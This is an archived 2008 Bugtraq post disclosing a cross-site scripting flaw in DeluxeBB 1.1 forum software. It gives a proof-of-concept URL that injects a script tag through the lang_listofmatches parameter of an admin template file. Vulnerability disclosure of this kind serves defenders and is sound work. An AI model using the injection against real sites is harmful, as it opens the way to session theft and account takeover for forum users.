lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <200801221807.53801.nbbn@gmx.net> Date: Tue, 22 Jan 2008 18:07:53 +0100 From: nbbn@....net To: bugtraq@...urityfocus.com Subject: DeluxeBB 1.1 XSS Vulnerabilitie ######################################################## #Founded: 21, January 2008 #Autor: NBBN #Type: XSS #DeluxeBB Version: 1.1 #Register Globals: ON #Magic Quotes; OFF ######################################################## poc: http://www.site.tld/path/templates/default/admincp/attachments_header.php?lang_listofmatches=<script>alert("XSS")</script>